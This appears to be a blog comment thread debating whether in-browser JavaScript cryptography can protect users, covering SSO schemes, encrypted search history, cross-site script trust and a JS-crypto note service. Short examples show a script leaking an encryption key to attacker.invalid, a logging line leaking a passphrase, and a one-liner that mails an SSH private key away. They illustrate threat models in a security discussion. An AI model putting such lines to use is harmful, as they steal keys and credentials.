    * “Proof of work” systems
    * Browser plugin can checksum JS crypto code

  11. A little offtopic but since it was mentioned: does anyone know how to use sslstrip to sniff your own traffic? I tried using an http proxy on localhost but the remote ssl hosts keep sending back “bad request”. HTTP works fine. Presumably I’m missing something obvious.

  12. I took your post as a challenge to come up with something. It is, of course, horribly wrong and only marginally useful; but I think it’s not, theoretically, broken (that is, I’ll assume, for the sake of discussion, that client-side JS crypto libraries are free of stupidities and we don’t need to worry about side-channel attacks.) WARNING WARNING WARNING: the scheme below is off the top of my head and may be horribly broken. Recall, “It’s got crypto in it. Everyone always fucks it up.”.

    With the above disclaimer: Javascript in the browser can be used to do a peculiar kind of (“single-“)sign on across trust domains with one less round trip.

    Here’s a scenario to justify the threat model. Let’s presume we have a “daily lolcat” site: create an account with an e-mail and password, we send you a lolcat daily with an upsell to get the image on a mouse pad. Once a week, we order mats in bulk and ship them. The “daily lolcat” web server only hosts a sign-up form, tons of lolcats, and some extremely poorly-written software that combines a mailing list archive with some links to an external store (“get yesterday’s lolcat on a mousepad / on a coffee mug / …”); we’ve outsourced the actual mailing list and the store. Really, the site doesn’t need usernames (e-mail accounts) at all, but we want our users to subscribe to our mailing list before we show them the lolcats. (Recall, we buy in bulk and ship immediately – without being able to sell “back issues”, our website doesn’t make us much money. Our mailing list does.) The site doesn’t actually need passwords at all, either – but we’ve found that doing away with passwords leads to lot of scared-and-confused customers, which is bad for business. Still, the “daily lolcat” site is probably full of security holes (which we can’t all fix – the boss won’t let us spend that much time on it, and PHP makes our eyes bleed anyway), and it would be bad for business if users’ passwords were compromised (because they’ve inevitably reused them everywhere).

    In short, we require security of our users’ passwords even if the low-trust (“lolcat”) server is compromised. Note that just hashing the users’ passwords isn’t good enough: even if we use something sane like PBKDF2, their passwords are disastrously weak; even worse, an attacker could obtain plaintext passwords of anyone who logged in while the server was compromised.

    So, we install a second, trusted (“actually secure”), server which hosts nothing but a HTTPS login form. This form includes some Javascript (and fails whenever Javascript is disabled) and contains E(PH(password), c), where E is encryption, PH() is a key derivation function like PBKDF2, and c is a random challenge. As soon as the form is sent to the browser, the secure server sends a public-key signature sign(sk, c) to the low-trust server (over a secure channel – they’re in the same data center and we run a cable between them, or somesuch). The web browser decrypts E(PH(password), c) using the password entered by the user and submits the result to the low-trust server, which accepts this if and only if sign(sk, c) is a valid signature on the submitted data.

    Now, a compromise of the low-trust server is rather harmless: it doesn’t ever process any interesting data, not even hashes of our users’ passwords, and it doesn’t store any interesting data. (Of course, this “harmless” presumes that users’ browsers are secure. But we can dream).

    We could, of course, make our users submit the form to our secure host and then send them over to the low-trust server with sign(sk, username) in a cookie or in the URL, but that would require an additional round trip. I’d say having to deal with Javascript crypto is worse, but I could imagine doing it if that extra round trip gave too many users enough time to realize that their lives are not so meaningless that a lolcat mouse pad would not degrade it further.

    1. Funny description, but I don’t see how this requires JS crypto. Replace all the signatures, etc. with a simple cookie.

      Assuming the submitted password is correct, the secure login server sends a cookie to the client browser as part of the response to the form submit. It also sends the cookie to the insecure server via the shared link. The browser then sends this cookie to the insecure server with all subsequent requests. The insecure server checks for a match against its local copy of the cookie.

      This is just basic single-sign on behavior today. How is this more round trips?

      If you’re saying the secure server in your protocol doesn’t validate the password, there’s a serious security problem. You’ve just handed any pre-auth attacker a hash of the user’s password, which will allow them to crack in parallel offline. This is much worse than a potential compromise of hashes stored on the insecure server since you now have a guaranteed compromise of hashes to anyone on the Internet.

      In particular, an attacker can observe a single E() token and valid “c” response for it and then do a fully offline attack at guessing passwords. Or, they can contact the server to retrieve an E() token and then do a partially offline attack of deriving “c” values from password guesses. The resulting “c” values can be queued up and then sent to the insecure server to check validity.

      In the latter case, the insecure server could attempt to rate-limit requests for users with bad “c” values. However, it would not require any further contact with the login server, which would presumably be where you want to enforce account integrity.

      Neither of these attacks works in a traditional SSO model. You can attempt to guess cookies, but they are not related in any way to the user’s password.

      1. Yes, I see that a standard SSO solution works. Indeed, the form is never submitted to the secure server (so in particular, it doesn’t validate the password) – the minor advantage of saving a single round-trip is the entire “point” of this protocol. But you’re right that this scheme falls prey to an offline dictionary attack that I’d failed to consider; sorry!

        I don’t think it’s possible to get a pair of (E(), c) – note that E(PBKDF2(password), c) is sent over a HTTPS connection between the secure host and the client, so I don’t think an adversary can get both. However, an adversary can get E(), and can check the decrypted data for validity if it has sign(sk, c) (from the insecure host; network access probably suffices.)

        Of course, we can introduce rate-limiting by requiring the insecure host to contact the secure host in order to verify a password, as you suggest; but that’s hardly elegant. I’ll try to think a bit more about this tomorrow; sorry for posting nonsense…

  13. This is an example from some actual code I implemented at the company I currently work for. And we in fact used a js crypto lib to do it, so maybe it’s relevant to this post’s discussion.

    For sake of simplicity, let’s say my company has a web application that has searching capabilities on large and complex data sets. And we have two different types of users — 1) those who, by requirement of their employer, MUST have a record kept of all their search history and 2) those who, by requirement of their employer, MUST NOT have a record kept of their search history.

    For (2), the requirement (and paranoia) are so strong that those customers require that WE not store any record whatsoever that could be used to re-construct what searches they made. We literally have disabled web server logging as part of compliance with that request. They go to great lengths to have users’ browsers running in incognito mode where cookies and browser history are not kept.

    So, with such opposite use cases, I devised the following system:
    – for users of (1), they opt into “tracking” of their search history. for users of (2), they simply don’t opt in, and are thus implicitly opted out of any tracking.

    – for those (1) with “tracking” on, what happens is this:
    1. the server first generates a random “key”, which it does not store in any way, and transmits that key to the client via HTTPS, and then forgets it.
    2. the browser keeps that key in memory, only via a session cookie (goes away when the browser is closed).
    3. each time a user does a search, the javascript takes the key, captures the browser’s URL (for a search), and encrypts the URL with the key.
    4. then the javascript sends the encrypted value (without the key) back to the server via a separate XHR request.
    5. the server stores in a cache db table all the encrypted values (which it can’t do anything with, without the key, of course), along with the user’s id.
    6. if/when a user wants to retrieve their search history from that browser session, the javascript requests all the encrypted records from the server (which it then empties the table after sending), and the javascript uses the in-memory key to decrypt and display the URLs.
    7. the cache db table clears out every 12 hrs, and is also proactively purged when a user explicitly logs out.

    With this system, we can plausibly claim that we keep no record of users’ history that we (or anyone who got hold of the DB or logs) could do anything with. The user (and in fact, their browser session) is the only one that can decrypt the data. As soon as the key is lost, the data is permanently inaccessible. And key and data are never stored in the same place (other than in temporary memory and on the display).

    The primary reason we didn’t just tell users that want to “track” to use their browser history is ease-of-use (they want a simple way of copy-n-pasting that history). But it’s also because we use #hash URL changes for search params, which don’t always in all browsers end up in reliably separate and accessible search history entries.

    1. Kyle, this sounds like you are trying to use encryption to create privacy. But does it work? Because you use a session cookie to hold the key, it will be transmitted to the server each time you request some object from the server, and thus the server can connect the user to the key. Not sure why you use the session cookie anyway.

      Probably, if someone can get hold of the logs, they might also have access to the webserver configuration; they could log the cookie, userid/-name, etc. in the logfile. Or just look at the IP-address, I guess. :-)

      Maybe you should explain a bit more about what you are doing. :-)

      1. Lennie-
        The reason for storing the key in some “persistent” place client-side is so that it’s preserved across page refreshes (so they don’t lose their search history upon page refresh or page navigation). One place to store the key is a cookie, which I actually mis-spoke in saying that we use. In fact, we store it in the browser’s window.name property.

        Moreover, if we had to use a cookie to persist the key between page refreshes, it would seem one way to prevent it from going back to the server would be to set it (using javascript) in a cookie for the page’s domain, but make our Ajax requests to a different domain (cross-domain Ajax via CORS, JSON-P, etc). In that way the browser wouldn’t transmit the cookie (with the key in it) back to the server.

        BTW, we only generate the key on the server as a way to take advantage of better randomness. Of course, the key could just be generated in the JavaScript, but we didn’t trust it as much. If server compromise were a concern, we could keep the key only in the browser in that way, as I think keeping the key and encrypted values separated provides decently reliable protection.

      2. Depending on domain name to isolate cookies seems kinda fragile. You don’t want a site redesign to break your assumptions. It’s better to keep it a local property that is not sent to the server without active intervention.

    2. Can you elaborate on why you don’t just store the client history in the same place you store the key?

      Also note that the encrypted data does contain some information (length and timing of the queries). Finally, note that this is not exactly (claimed to be) “host-proof”.

    3. Kyle, I was thinking, with a compromised server you’ll always be screwed as they can change your javascript.

      Have you thought about storing it clientside somewhere else: HTML5 client-local storage, Google Gears local storage, an HTML5 client-side database?

      But I guess you would. :-)

      1. Every client-side persistence mechanism is space limited. Some are more limited than others. But the legacy browser support that we require (back to IE6, ugh) dictates that we limit our options to something that works everywhere. That limits us to cookies (already discarded per above), window.name (limited to 2000 chars max), and flash LSO’s (flash discarded because of the complexities of exposing the storage-size UI in a friendly way, etc).

        Our typical users that are keeping track of their session history are performing sometimes 300-500 different searches in a single session (we track each filter change as a unique search). The URLs themselves are quite long, sometimes 200 or more characters. It was estimated that more than half our users would run out of space in something like a cookie, window.name, or even a flash LSO. As such, we needed a persistence location that was not space limited.

        This is actually the primary design motivation for how I built the system, to store the history in the DB on the server (so it’s not size limited), but keep the key for decrypting the values only in the browser. Each side then has only half the answer, and that provides “pretty good” protection.

        Yes, if the server is compromised, there’s no way to guarantee protection. But keep in mind there’s different levels of “compromised”. There’s the “read-only” compromise (looking at logs, DB, etc) and there’s the “read-write”. We’re pretty well protected in the “read-only” compromise, and we accept that a “read-write” compromise is nearly impossible to prevent given a motivated enough hacker.

      2. The “read-only” compromise is a myth. If it existed, a read-only compromise of session key and then your database is enough to expose the history. Worse, since the URLs are written to disk, the latter component persists for an even longer time.

        Example attack: read old history from disk, then guess keys because you used Debian PRNG to generate session keys.

        I’d prefer the less-persistent memory-only log vs. this thin veneer of crypto. But like the example I used in my post (loophole to avoid PCI audits), there may be a business case for misleading your customers.

    4. No offense, but this is exactly the kind of false hope JS crypto gives. Your server generates the random session history key, sends the JS code to the client, and stores (presumably on its hard drive) the encrypted history records. So a sysadmin debugging an issue has all the data needed to reconstruct the history, assuming they turn on logging of the session key or change the code to send the user a known debug key.

      Instead of all this complexity, what about storing the history in an in-memory buffer on the server? You can mlock() the data into RAM to be sure it doesn’t hit swap and even disable various debugging routes (ptrace, /proc, /dev/mem, etc.). No crypto required and you have the same level of plausible deniability. If you’re concerned about the memory cost of 300-500 URLs, compress the buffer.

      I don’t think your requirements are clear since the current design doesn’t actually meet the requirement “MUST have a record kept of all their search history”. Access to that history is lost when the browser closes.

      Also, did you really consider the client-based history approach or discard it because it wasn’t cool enough? A quick google search shows this easy way to cut/paste URLs:

      http://www.techsupportforum.com/microsoft-support/internet-explorer-forum/151111-copy-paste-history.html

  14. Now that I think about all this client-localstorage stuff.

    Maybe we could all make it work if we had:
    – client-local-keystorage (per domain ?)
    – javascript/html (sometimes server) only handle encrypted data
    – have a special textarea with extra GUI which can be used by the user to decrypt data. The attributes on the textarea only specify how to decrypt the data (high level methods and keyname) – the user would be prompted: do you want to allow data in this field to be decrypted with key X
    – have a special file api with extra GUI which can be used by the user to decrypt files
    – a browser which had a number of high-level encryption methods built in, which can be controlled from the GUIs mentioned above. These could be checked by people in the know, and used by users and people building websites without having to know the details of how to implement these things properly.

    Would that make any sense ?

    1. Only your last point (browser-supported APIs for crypto) would really change anything. You would need:

      – Secure protected keystorage
      – Every browser user has an identity (keypair, cert) stored there
      – Ability to import keys, authenticate requests, etc.
      – High-level crypto ops such as “encrypt/MAC message to recipient X”

      Funny enough, I just described PGP.

      This kind of thing won’t happen for a very long time though because fundamental questions like “how do I take my keys with me to another machine or browser install on the same machine?” are difficult.

  15. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.

    1. Your page can’t set document.domain to “example.net” unless its origin is example.net or a subdomain such as http://www.example.net.

    2. Another page loaded from ads.example.net will not be same origin with example.net unless it also sets document.domain to “example.net”.

    Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src=”evil.ads.com”></script>. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net‘s origin (whether it has been modified by document.domain or not).
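
    A minimal illustration of that threat, with hypothetical names: any script the page #includes, wherever it was loaded from, runs under the page’s origin and can silently wrap a “trusted” routine.

        // Suppose the page earlier defined window.encryptNote(plaintext, key)
        // (a hypothetical name). A sourced script, running under the page's
        // origin, can shadow it and leak its arguments before delegating:
        var realEncryptNote = window.encryptNote;
        window.encryptNote = function (plaintext, key) {
          new Image().src = 'https://attacker.invalid/c?k=' + encodeURIComponent(key);
          return realEncryptNote(plaintext, key);
        };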

    In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would.

    This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.

    /be

    1. Brendan, thanks for the comment. I read the bulk of it as “it’s even worse than you think, and document.domain is not the main problem.”

      Regarding your #1 and #2, I was assuming the page was loaded from http://www.example.net with two scripts on it (one for crypto and one for ads, sourced from subdomains of example.net). If the script from ads.example.net set document.domain for its own convenience, now all scripts on example.net can override the crypto script by setting DOM elements on the same page (not discussing loading another page).

      1. Brendan, thanks for the comment. I read the bulk of it as “it’s even worse than you think, and document.domain is not the main problem.”

        It usually is (worse than you think), to quote Mal Reynolds (“Serenity”).

        I don’t think that document.domain is especially relevant, but you could argue it ups the ante because cross-site scripts dilute trust and yet can set document.domain. I hear you, but my response is to attack the primal flaw.

        Again, if you have one page loaded from a superdomain, or two pages loaded from subdomains that join to the superdomain via reciprocal document.domain settings, loading scripts cross-site includes those scripts in your “trusted computing base”. This is the primal sin.

        Regarding your #1 and #2, I was assuming the page was loaded from http://www.example.net with two scripts on it (one for crypto and one for ads, sourced from subdomains of example.net). If the script from ads.example.net set document.domain for its own convenience, now all scripts on example.net can override the crypto script by setting DOM elements on the same page (not discussing loading another page).

        This is correct, but it may leave the impression that the scripts coming from subdomains of example.net is relevant or necessary. It’s not — the scripts could come from anywhere, and because you src’ed them, they run under your (the including page’s) origin trust label (AKA principal), so they can set document.domain just as if they were inline scripts in your page. They were #included.

        Note my use of *page* vs. *script*. The “origin” in the same-origin model is a trust label that comes from the page’s redirected-to URL. It is the principal for all code loaded by that page, whether via inline <script> tags, <script src=”http://www.example.net/scripts/fun.js”></script> out of line yet same-origin script loads, or truly cross-site script loads.

        The problem is cross-site script loading. My W2SP 2009 talk proposed putting cross-site scripts into a penalty box: a trust label under the including page’s origin in the label lattice, which could have (by default policy; adjustable by the including site with policy knobs) strictly fewer rights to the including page’s DOM, cookies, etc. — including document.domain setting.

        We’re going to implement something like this in Firefox, post Firefox 4. In Firefox 4, we have CSP.

        /be

  16. I updated the epilogue of the post again:

    * Since it was so interesting, listed Brendan Eich’s comment on cross-site scripts
    * More accurately characterized Daniel Franke’s proposal re: “proof of work” systems, based on his comments.

  17. Nate –

    I’d like to start out by saying, at a high level, that your analysis, while accurate from a purely security point of view, seems slightly myopic and baseless in the context of current technology trends, cultural technology patterns, history, and real human beings.

    For sure you are aware that pretty much all the players on the internet are aiming to promote javascript to become a first-class application citizen: faster js engines, browsers that have tighter integration with the OS, application stores that are built to house js apps, and even new pieces of hardware meant to do nothing *but* run a browser as the entire operating system.

    I am also sure you are aware that, by any objective analysis, we can say that a simple, ubiquitous, secret sharing technology has never gained traction with non-nerd computer users: PGP is utterly worthless to the normal consumer. People who don’t regularly use usenet or protect their pockets with plastic haven’t ever even heard of it, nor will they in the future, because the technology requires the discipline of each and every participating client for it to work – it’s not feasible to have a solid PGP system where some users are non-technical. A decade of people trying to figure out how to get normal people to use it can only come to one conclusion: you can’t. It’s provably a failed concept.

    The reasons why are so important in the context of normal people wanting to exchange secure information that I am amazed the experts considering the security of consumer systems seem to regularly ignore them, because a perfectly secure but unused system provides *zero* secrecy to its non-users.

    Consider the following scenario as the context for my commentary: three people wanting to share banking numbers as part of a small construction project to build a mother-in-law’s studio.

    1) myself. a nerdy linux programmer that understands pgp, ssl, rsa, and how to keep my machine free of viruses.

    2) my mother. running who knows what version of a buggy windows system.

    3) my wife. who accesses much of her information on her phone.

    I don’t think I have to explain why a pure client-based encryption system is a non-starter here: simply getting my mother to install and upgrade reliably anything as complex as PGP is totally out of the question. Because she lives in Alaska, me doing it for her is impossible. As for my wife, although I could probably figure out how to get some third party PGP application on her phone, unless it was fully integrated with the native email application, rest assured it would go unused – add to that my lack of confidence in the effectiveness of some app store developer’s crypto knowledge, further doubts about the ability of the phone’s hardware (random number generation) to get the job done, and fear of my wife leaving her unlocked phone somewhere with a private key sitting on disk, and hopefully everyone reading can agree that this trivial real-world use case essentially neuters the PGP approach from the get-go *regardless* of the efficacy of any cryptographic techniques it might employ.

    Considering that data is only as secure as the total security of all systems participating in the secret sharing, we can see why, in the general case, real-world PGP is useless at protecting secrets except in very special cases where the kinds of users and systems participating can be tightly controlled and understood – a company intranet or government email system, for example.

    Now, assuming that the three of us, myself, my mother, and my wife, would be comfortable with a system that at least secured the storage of our information but did not ensure privacy (your second system), I would say that just getting all third parties to use gmail with https would be a more reasonable approach than relying on some new, untested system that would manage private keys and encryption on the server. I personally trust google to protect my data from attackers more than I trust some random new SaaS offering. Also, as someone who understands RSA encryption in general, having the keys managed on the server doesn’t give me any warm fuzzies with regard to data *privacy*. I’m more concerned with some underpaid system administrator sniffing my bank account than some google employee, let alone a third party attacker, doing the same. In summary, unless a service is at least *trying* to hide my data from its employees I’m flat out going to assume that my bank account numbers are known to all of them and probably are accidentally written to log files somewhere to boot. Without some attempt at a privacy layer between myself and the server I’d just as soon use gmail+https, so for myself, and anyone who cares about privacy, your second suggestion is a non-starter too.

    Where does that leave us? I think it’s entirely accurate to say that exchanging secrets securely and privately by normal, non-technical users is a real-world need underserved by the technical community, on the basis of their insistence on refusing to acknowledge the usage patterns and willingness to learn new skills of real-world users in real-world situations: not everyone runs the latest *NIX kernel on a stationary PC. At the same time real people are exchanging more and more private information on a variety of devices and platforms. I believe that only an HTTP-based solution has any prayer of keeping up with the proliferation of devices, platforms, and usage patterns we are currently seeing in the consumer space, and that the demands users have regarding data privacy are only going to increase. While there certainly might be technical limitations to what can be done in today’s browsers with today’s javascript, it’s simple pragmatism that is inspiring us (dojo4.com) to build a tool that uses least common denominators to provide a hybrid (js in the client and openssl on the server) system that will be more ubiquitous and simpler to use than current client systems and much more secure than https-based email exchanges, and will therefore be more viable for real people than anything that currently exists. We’ll be more than happy to provide you all sources after our beta launch of http://cryptic.ly (feel free to edit that url out if you are uncomfortable linking to it from your blog) and look forward to any analysis or comments you might have as a tester or code reviewer. We firmly believe that the web is the new operating system and that giving up on privacy and security simply because the nature of computing is undergoing a transformation is not an option. Without that sort of challenge there’d be nothing fun for us to do! ;-)

    1. I don’t think anyone disagrees that usable security is good. In practice, this often means using HTTPS and trusting some company to run their servers securely (your gmail example). Such trust seems to work, usually, but you don’t need, or want, Javascript crypto. The people arguing for JS crypto usually want “host-proof security” or such, which seems impossible to achieve.

      I don’t think I really understand what you’re saying.

    2. It seems like you put a lot of time into your note, so let me try to distill it:

      – No one installs client-side security software (PGP)
      – Everyone has a browser
      – So JS crypto is better because it can be widely used

      The whole point of my post is that you could achieve the exact same trust model with server-side crypto. And this would not have the disadvantages I pointed out (1-7 in the post) that are unique to JS crypto. Server-side crypto still works via a browser with HTTPS and would be just as widely usable. More so if you count people using NoScript.

      I see you have a horse in the race with your JS crypto notes service. It’s when you say that “Your notes are private because even cryptic.ly can’t read them” that I think you are being misleading. There is no difference between these two scenarios:

      – Admin attaches debugger to your server-side crypto process to debug something, sees user’s passphrase
      – Admin adds logging to SEKRIT_CRYPTO.js to debug something, sees user’s passphrase

      The reason there is no difference is that the trust model is the same. In both environments, all the trust is in the server. So JS crypto can only be as good as, never better than, server-side crypto. Given that it can only be as good as or worse, and has significant other weaknesses, why mislead your users?
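
      To make the second scenario concrete, a hypothetical deriveKey() inside SEKRIT_CRYPTO.js after the admin’s one-line “debug” addition (the function names are invented; nothing visible changes for the user):

          function deriveKey(passphrase) {
            // the admin's added "debug" line, shipped to every user
            new Image().src = '/debug-log?p=' + encodeURIComponent(passphrase);
            return realDeriveKey(passphrase); // realDeriveKey() is the original routine
          }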

      1. Nate –

        Your paraphrase is mostly accurate. Sorry to be so wordy.

        But I disagree that the trust model is the same. It *is* of the same quality, but not quantity. For example, I ride my bike to work everyday. I happen to ride very expensive bicycles and, therefore, never leave them anywhere unattended at night. I do have to lock them up from time to time, however, but always do so in front of a window. Either the window of my office or the window of the coffee shop, etc. This prevents some opportunist from simply walking off with my bicycle. Similarly, using js-crypto means that, for instance, a developer with access to our server could not simply grab passwords using ‘tail -F’. Someone grabbing backups could not look at web server logs and snatch sensitive data. To read the data would take a much more sophisticated attack. Combined with locking down the server and access to it in general, this is actually a huge trust gain, because it means less clever people need to be trusted less ;-) Simply put, it dramatically reduces the number of people capable of mounting an un-noticed attack while simultaneously increasing the time it would take to mount an attack. A concrete example is that having a deploy key, but no shell access, would make the attack you describe pretty dang hard to mount – I am certain no copy editor or designer we work with is capable of it. In fact, this is simply a ‘trust work function’ – by making it harder one can trust less. Most people have locks on their doors but continue to have windows in their houses based on this same line of reasoning which, somewhat surprisingly, bears itself out in the real world.

        For the record we would never assert that js crypto is *better* than server side crypto – merely that it allows the user to trust us *less* while still being confident enough to use the service.

        Indeed, it is *precisely* this line of reasoning that has caused you to deduce that the paradigm of downloading js from a server and running it is somehow *less* secure than running some MUA with PGP. Consider, the average *highly technical* PGP user is simply going to run ‘port upgradeself’ or whatever, as root, and slurp down loads of un-audited bits of scripts and dlls from a loose collaboration of software mirrors located *somewhere*, by, *someone*. Sure, there are signatures there, but we know from experience/history that package management systems have been a vector for successful attacks many times. Recall that each install script has access to every other package – as root – during the install. As we speak there are rotten versions of some of my own open source packages on rubygems.org – through a bug in some sync code. As far as I know there are no security flaws in them. I hope not, some of them are installed on your box if you run OSX or LINUX. Updates are on github, but not on your system.

        The only reasonable thing to say about this paradigm vs dynamically running code from inside a browser is that *less* verification happens (https + certs give some degree of verification) and that one methodology results in running unverified code *more* than the other. Still, it’s really shades of grey, isn’t it?

        In the end I think an honest person will say that, when it comes to running software that is downloaded from the internet, the user is basically eff’d with respect to security. I’ve written code for classified systems and know for a fact there simply isn’t a wire into these buildings and that no media is allowed inside for this exact reason. They even charge the glass so you can’t listen to the windows. The basic premise is ‘outside bad’ and ‘inside good.’

        In general I think that people are so busy standing up straw-man arguments that they are missing huge opportunities to re-think the way we’re doing things to provide a safer, more private, experience for users. Some random food for thought:

        – local storage isn’t good for keys, but it could be great for the *entire application*. if you downloaded it once, like normal client software, the lower frequency of updates/verification means that a slightly more manual procedure is possible. TiddlyWiki does this now.

        – c code absolutely sucks to audit. so does fortran. so does java. python, ruby, and javascript are much simpler to audit. this is a huge problem in science right now: no one can read the terrible libraries, so few eyes actually do audits despite the fact that said libs control weather forecasts for flying, etc. openssl exemplifies this to the Nth degree.

        – there are vastly fewer browser platforms than there are operating systems if you consider mobile devices.

        – there is no reason a js-crypto app needs to store its data on the server *or* the client. authenticated/https PUT links could allow only the code to come from the server. combined with js-crypto and html5 local storage for the app itself this could be a powerful combination since the user’s credentials would separate code from data and the third party (in this case amazon) would simply see chunks of encrypted text from who knows what application being stored for some teeny subset of its users with no way to determine which application created them.

        In short, I honestly believe that if people started brainstorming about the problems from the user’s end that solutions to those new paradigms could be developed with *today’s* tool sets.

        Kind Regards

      2. For the record we would never assert that js crypto is *better* than server side crypto – merely that it allows the user to trust us *less* while still being confident enough to use the service.

        A developer who would never log passwords in their server-side app can also be trusted not to log them from your client-side JS. Likewise, someone who does add logging of them on the server side can be expected to do the same for client-side JS also.

        JS crypto does not allow users to trust you less. They have to trust you exactly the same amount. And, they have to trust you to do a good job despite the limitations (points 1-7) of JS crypto.

        All I’m saying is “why handicap yourselves right from the start by making it harder to do a good job?” Since there is no difference in trust model, use the environment that gives you the greatest chance of success.

        Any claims that JS crypto allows the client to trust the server less are wrong. It trusts it just the same amount.

      3. Nate –

        I understand your trust analysis completely. I guess I am still not liking the conclusion, for two reasons:

        1) I do not want to accept that there is no solution which can provide a greater level of privacy to the user. Using a PGP-enabled MUA suffers from the same trust relationship (I have to trust that the author isn’t sending system reports of /etc/passwd to his russian address… etc) and yet people, including those in the crypto community, seem to be totally comfortable with the idea that these kinds of clients afford privacy – “mail -s HAXOR ara.t.howard@gmail.com < .ssh/id_rsa # at coffee shop” aside…

        2) I think only half of your 1-7 are correct.

        1.,2., and 3. have *nothing* to do with js, browsers, or technology at all and are easily solved cultural issues. They are basically straw man arguments.

        4. seems backward to me – in the browser one has a toolkit that has access to all system primitives AND which has decades of work evolving to be a safe container for executing arbitrary code from the internet. Compared to MUAs it’s an *infinitely* better candidate for providing privacy from a code provider than any other tool on the system. For instance, no MUA in the world has a domain security model for its plugins… This is, however, your strongest objection for sure.

        5. is simply false. random.org is great, it’s https, and probably better than every single mobile phone’s prng.

        6. is also false. there are actually only a few browser environments that matter for 95% of the market. Developing client software for even one OS, for instance linux variants or windows variants or palm os, provides more platforms than this.

        7. is a straw man. this situation exists for every package management system in the world, for some more than others – windows updates alone render this criticism invalid.

        There are other pretty huge stretches: saying that ‘view source’ doesn’t work because it can’t show you the actual code is like saying reading c source isn’t valid unless you know which compiler flags were used to build the binaries… etc.

        Honestly, I bet you could come up with 7 reasons why people should not use a PGP-enabled Outlook mail client as well, and yet no one takes any issue with someone saying that system gives its user privacy.

        Do you disagree strongly with all of what I've said, or maybe just some?

        In the end I think that traditional client software has *exactly* the same trust model as running javascript: I publish code for you to run, you download it from the internet, and then you run it. Nothing can change the fact that the ultimate trust relationship in both cases is that you, the user, trusts me, the author, and the distribution chain as well.

      4. I’m sorry, but “random.org” as a response to “clientside JS has no cryptographic PRNG”? I can’t take this seriously any more.

        I’m going to assume that nothing I say will convince you to convert your notetaking website from JS crypto to server-side, and we should just leave it at that.

      5. Ara, you don’t appear to understand the points Nate is making.

        You take exception to (1), (2), and (3) because nothing in the Javascript standards dictates that JS couldn’t have trustworthy, peer-reviewed, high-level crypto frameworks built in the future. “That’s not fair!”, you seem to imply. Attackers don’t care about “fair”. The point Nate is making is: because of those factors, any developer who wants to build a crypto-protected note-taking application has to implement their own crypto framework from scratch, and, from a decade and a half of professional observation, even full-time professional cryptographers who attempt to build frameworks from scratch manage to screw it up.

        You take exception to (4) because, as you see it, browsers are more secure than other desktop programs. That’s not Nate’s point. When you build crypto code into an MUA, you aren’t overloading SMTP or MIME to do key exchanges; on the other hand, when you attempt to run crypto out of a Javascript, you are completely at the mercy not only of all of the browser’s baroque rules regarding origin and content from the DOM, but also of all the side effects of the code that implements them.

        You take exception to (5), and suggest that instead of a secure random number generator, developers can just make async calls to a web service to provide random number generators. Had Nate been as creative as you, he could have summed his whole argument against JS crypto up as, “JS crypto is so bad, you’ll consider making async HTTPS requests simply to fetch random numbers from RANDOM.ORG”.

        You take exception to (6), arguing platform diversity isn’t a real challenge for Javascript development, which is to say that you think it’s easier to make crypto work securely in browsers than it is to render text in different fonts; you also seem to think that as long as the language behaves similarly at a language level on multiple platforms, the security impact of coding decisions for those platforms will be the same.

        You take exception to (7), clearly missing the point, which is that in a desktop or server environment you make a deliberate decision to install and run code, and that decision gets made perhaps once a month; browsers run content-controlled code and make that decision every couple of seconds.

        Again, your arguments about Javascript cryptography seem entirely based on how you want the world to work. One imagines that when someone finds a terrible flaw in the security model of “cryptic.ly”, you’ll be fully prepared to blame it on browsers. The hint of exasperation you’re picking up in this post and these comments is from prolonged contact with people who provide crypto tools to end users without taking responsibility for their safety.

      6. i still cannot see how the trust models are the same: if one does pure server encryption the client has ZERO chance of detecting an attack. if the attack involved modifying js the client has SOME chance of detecting an attack. this really is not the same.

      7. Thomas –

        re: 1,2,3. i understand that. however i’m most concerned with technical barriers, not cultural ones. of course being aware of both is important, but i’m mostly interested in focusing on technical barriers.

        re: 4 is legit and a major concern i agree. it’s not impossible though.

        re: 5 honestly, if you’d trust me to run openssl on a server on your behalf, why wouldn’t you trust random.org to give back good random numbers. after all, you have no idea what i’m doing on my server – i might be using random.org there!

        re: 6. if you evaluate that concept in the context of ‘any mobile platform’ then yes, i think it better to assume uniformity of js platforms before os platforms.

        re: 7. maybe you’ve missed the developments happening in js, but there are tons of ways around this, not least of which is caching the js to be run locally in html5 storage. again, this is a teeny technical issue to solve.

        for the record, my arguments are not based on ‘how i want js crypto’ to behave, rather, they are based on the desire to do something better than gpg for average computer users, for whom it does nothing.

        regards.

      8. Ara, you still don’t understand (7). The issue is not simply that you can’t, in any modern browser, reliably verify the crypto-bearing Javascript you’ve been fed from a root of trust. It’s worse than that: the issue is that even in the fantasy world where you could do that single verification step, you still can’t verify the whole Javascript runtime. It’s fed from multiple sources, not just a single tag.

        People keep making the same conceptual mistake of assuming that the Javascript verification problem is simply that of “here’s a .js file I requested, is it the same one I saw last time”. That’s not the challenge; it’s just a tiny part of it. The challenge is, using that (currently nonexistent) tool and several others, verify the entire state of the Javascript runtime, because if it at any point comes into contact with a tainted DOM element or a tainted script, the whole interpreter can be silently hijacked.

      9. When I read some of the comments again I think, it’s all a matter of trust. What do you trust ? Personally I think we are all cynical bastards and don’t trust anyone. :-)

        We know people want to create applications in the browser which they think need crypto (heck they do that now and it does not work). They do this because they want to create privacy. Only for the data being sent. These people very well understand that when the server is involved the server can log who is communicating with whom. The web application or server can make a copy (like logging or BCC) or send it somewhere else. But that is exactly why they want crypto at the client. Only reveal the cleartext as late as possible in the process, as near to the user as you can get it.

        Side A: this is because I don’t trust the server.
        Side B: then you can’t trust javascript, because it came from the server
        Side A: then you should add it to the browser
        Side B: but why not create/use a real native application instead
        Side A: but the native application was downloaded from an internet server as well, so how is that more secure ?
        Side B: but with a browser application you download javascript and many other parts, you can not verify it as a whole
        Side A: sure you can, create an extension to the current html5 offline-application-cache-manifest so the browser can check what it is running
        Side B: but how does the browser verify this ?
        Side A: we use the same SSL-system we do with native applications, they will be signed or put it in DNS, signed with DNSSEC
        Side B: …

        Can I ask something else ? as I don’t think this discussion is going anywhere.

